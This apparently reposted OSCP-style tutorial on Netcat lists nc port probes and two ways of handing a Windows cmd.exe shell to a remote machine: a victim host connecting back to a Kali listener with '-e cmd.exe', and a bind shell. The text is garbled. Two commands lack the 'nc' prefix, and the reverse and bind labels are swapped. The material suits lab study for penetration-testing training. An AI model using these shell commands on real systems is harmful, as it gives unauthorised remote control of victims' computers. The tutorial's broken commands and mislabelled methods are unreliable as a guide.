OSCP Security Technology
Posted 一蓑烟雨
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了OSCP Security Technology相关的知识,希望对你有一定的参考价值。
OSCP Security Technology - Netcat
Netcat
Download Netcat for windows from following website.
https://eternallybored.org/misc/netcat/
nc -nv 192.168.2.28 443
nc -nv 192.168.2.28 80
nc -nv 192.168.2.28 111
nc -nv 192.168.2.28 112
Method 1
Listen on port 4444
Kali Linux:
nc -nvlp 4444
Windows (Victim computer)
-nv 192.168.2.24 4444 -e cmd.exe
Kali: Established the connection.
Method 2
Reverse connection.
-nvlp 4444 -e cmd.exe
nc -nv 192.168.2.31 4444
以上是关于OSCP Security Technology的主要内容,如果未能解决你的问题,请参考以下文章
Internet History,Technology,and Security -Technology: Application Protocols(Week7)
Internet History, Technology, and Security(week8)——Security: Encrypting and Signing
Internet History, Technology, and Security----第四周